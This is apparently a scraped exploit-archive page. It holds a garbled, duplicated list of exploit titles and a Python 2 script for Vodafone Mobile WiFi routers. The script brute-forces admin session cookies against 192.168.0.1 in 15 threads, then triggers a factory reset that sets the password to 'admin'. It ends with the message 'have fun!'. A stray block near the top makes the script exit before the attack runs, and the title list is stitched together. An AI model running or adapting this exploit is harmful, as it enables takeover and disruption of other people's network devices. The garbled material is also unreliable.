
3 new exploits freeSSHd 1.2.1 - Remote Stack Overflow PoC (Authenticated) freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated freeSSHd 1.2.1 - (Authenticated) Remote SEH Overflow freeSSHd 1.2.1 - Authenticated Remote SEH Overflow Debian OpenSSH - (Authenticated) Remote SELinux Privilege Elevation Exploit Debian OpenSSH - Authenticated Remote SELinux Privilege Elevation Exploit AvailScript Jobs Portal Script - (Authenticated) (jid) SQL Injection AvailScript Jobs Portal Script - Authenticated (jid) SQL Injection AvailScript Jobs Portal Script - (Authenticated) Arbitrary File Upload AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload Serv-U 7.3 - (Authenticated) (stou con:1) Denial of Service Serv-U 7.3 - (Authenticated) Remote FTP File Replacement Serv-U 7.3 - Authenticated (stou con:1) Denial of Service Serv-U 7.3 - Authenticated Remote FTP File Replacement freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow PoC freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow PoC LoudBlog 0.8.0a - (Authenticated) (ajax.php) SQL Injection LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow PoC freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow PoC Hannon Hill Cascade Server - (Authenticated) Command Execution Hannon Hill Cascade Server - Authenticated Command Execution Telnet-Ftp Service Server 1.x - (Authenticated) Multiple Vulnerabilities Telnet-Ftp Service Server 1.x - Authenticated Multiple Vulnerabilities Femitter FTP Server 1.x - (Authenticated) Multiple Vulnerabilities Femitter FTP Server 1.x - Authenticated Multiple Vulnerabilities Cpanel - (Authenticated) (lastvisit.html domain) Arbitrary File Disclosure Cpanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String PoC MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String PoC FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service FtpXQ FTP Server 3.0 - Authenticated Remote Denial of Service NetAccess IP3 - (Authenticated) (ping option) Command Injection NetAccess IP3 - Authenticated (ping option) Command Injection Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow Novell eDirectory 8.8 SP5 - Authenticated Remote Buffer Overflow Apache Axis2 Administration console - (Authenticated) Cross-Site Scripting Apache Axis2 Administration console - Authenticated Cross-Site Scripting Easy FTP Server 1.7.0.11 - (Authenticated) 'MKD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit) Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit) UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow Easy FTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Authenticated Remote Buffer Overflow ActFax Server FTP - (Authenticated) Remote Buffer Overflow ActFax Server FTP - Authenticated Remote Buffer Overflow Oracle Database - Protocol Authentication Bypass Oracle Database - Protocol Authentication Bypass IRIS Citations Management Tool - (Authenticated) Remote Command Execution IRIS Citations Management Tool - Authenticated Remote Command Execution Airmail 3.0.2 - Cross-Site Scripting LamaHub 0.0.6.2 - Buffer Overflow Vodafone Mobile Wifi - Reset Admin Password Zabbix 2.0 - 3.0.3 - SQL Injection Zabbix 2.0 < 3.0.3 - SQL Injection Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution Acuity CMS 2.6.2 - (ASP) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution Alfresco - /proxy endpoint Parameter Server Side Request Forgery (SSRF) Alfresco - /cmisbrowser url Parameter Server Side Request Forgery (SSRF) Alfresco - /proxy endpoint Parameter Server Side Request Forgery Alfresco - /cmisbrowser url Parameter Server Side Request Forgery vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF) vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery
116 lines
3.8 KiB
Python
Executable file
116 lines
3.8 KiB
Python
Executable file
import urllib2
|
|
import json
|
|
from datetime import datetime, timedelta
|
|
import time
|
|
import httplib
|
|
from threading import Thread
|
|
from Queue import Queue
|
|
from multiprocessing import process
|
|
|
|
|
|
print """
|
|
Vodafone Mobile WiFi - Password reset exploit (Daniele Linguaglossa)
|
|
"""
|
|
thread_lock = False
|
|
session = ""
|
|
def unix_time_millis(dt):
|
|
epoch = datetime.utcfromtimestamp(0)
|
|
return int(((dt - epoch).total_seconds() * 1000.0) / 1000)
|
|
|
|
a=False
|
|
|
|
def check_process_output():
|
|
print 1
|
|
|
|
p = process.Process(target=check_process_output)
|
|
p.start()
|
|
|
|
print a
|
|
exit(0)
|
|
|
|
def crack(queue):
|
|
global thread_lock
|
|
global session
|
|
while True:
|
|
if thread_lock:
|
|
exit(0)
|
|
if not queue.empty():
|
|
cookie = queue.get()
|
|
headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % cookie}
|
|
req = urllib2.Request("http://192.168.0.1/goform/goform_get_cmd_process?cmd=AuthMode&_=%s"
|
|
% time.time(), None, headers)
|
|
result = urllib2.urlopen(req).read()
|
|
if json.loads(result)["AuthMode"] != "":
|
|
print "[+] Found valid admin session!"
|
|
print "[INFO] Terminating other threads ... please wait"
|
|
session = cookie
|
|
queue.task_done()
|
|
thread_lock = True
|
|
|
|
|
|
def start_threads_with_args(target, n, arg):
|
|
thread_pool = []
|
|
for n_threads in range(0, n):
|
|
thread = Thread(target=target, args=(arg,))
|
|
thread_pool.append(thread)
|
|
thread_pool[-1].start()
|
|
return thread_pool
|
|
|
|
def start_bruteforce():
|
|
global session
|
|
global thread_lock
|
|
queue = Queue(0)
|
|
start_threads_with_args(crack, 15, queue)
|
|
print"[!] Trying fast bruteforce..."
|
|
for x in range(0, 1000):
|
|
if thread_lock:
|
|
break
|
|
queue.put("123abc456def789%03d" % x)
|
|
while True:
|
|
if session != "":
|
|
return session
|
|
if queue.empty():
|
|
break
|
|
print "[!] Trying slow bruteforce..."
|
|
for milliseconds in range(0, how_many):
|
|
if thread_lock:
|
|
break
|
|
queue.put("123abc456def789%s" % (start + milliseconds))
|
|
while True:
|
|
if session != "":
|
|
return session
|
|
if queue.empty():
|
|
break
|
|
return session
|
|
if __name__ == "__main__":
|
|
now = datetime.now()
|
|
hours = raw_input("How many hours ago admin logged in: ")
|
|
minutes = raw_input("How many minutes ago admin logged in: ")
|
|
init = datetime(now.year, now.month, now.day, now.hour, now.minute) - timedelta(hours=int(hours), minutes=int(minutes))
|
|
end = datetime(now.year, now.month, now.day, 23, 59, 59, 999999)
|
|
start = unix_time_millis(init)
|
|
how_many = unix_time_millis(end) - start + 1
|
|
print "[+] Starting session bruteforce with 15 threads"
|
|
valid_session = ""
|
|
try:
|
|
valid_session = start_bruteforce()
|
|
except KeyboardInterrupt:
|
|
print "[-] Exiting.."
|
|
thread_lock = True
|
|
exit(0)
|
|
if valid_session == "":
|
|
print "[!] Can't find valid session :( quitting..."
|
|
exit(0)
|
|
print "[+] Resetting router password to 'admin' , network may be down for a while"
|
|
headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % valid_session}
|
|
req = urllib2.Request("http://192.168.0.1/goform/goform_set_cmd_process",
|
|
"goformId=RESTORE_FACTORY_SETTINGS&_=%s" % time.time(), headers)
|
|
try:
|
|
urllib2.urlopen(req).read()
|
|
except httplib.BadStatusLine:
|
|
print "[!] Password resetted to admin! have fun!"
|
|
exit(0)
|
|
except Exception:
|
|
print "[x] Error during password reset"
|
|
print "[-] Can't reset password try manually, your session is: %s" % valid_session
|
|
|